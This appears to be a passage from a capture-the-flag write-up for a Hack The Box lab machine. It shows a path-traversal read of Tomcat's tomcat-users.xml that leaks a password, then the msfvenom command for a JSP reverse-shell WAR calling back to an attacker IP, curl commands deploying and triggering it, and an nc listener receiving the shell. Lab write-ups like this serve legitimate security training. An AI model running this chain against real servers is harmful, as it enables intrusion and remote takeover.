3 :8080 tomcat9

Looking at tomcat-users.xml file in different paths:

view-source:http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml

<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

As we don't have manager-gui permission, we cant login to manager-gui and can only access http://megahosting.htb:8080/host-manager/html

Using https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#limitations

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.161 LPORT=6969 -f war -o shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
Saved as: shell.war

As password has special chars, finding docs for tomcat9 manager cli
https://tomcat.apache.org/tomcat-9.0-doc/host-manager-howto.html

$ curl -u tomcat:'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:2:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs

$ curl -u tomcat:'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/kashz --upload-file rev.war
OK - Deployed application at context path [/kashz]
$ curl http://10.10.10.194:8080/kashz

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.194] 59472
whoami;id
tomcat
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

Previous4 box enum Next2 :80

Last updated 3 years ago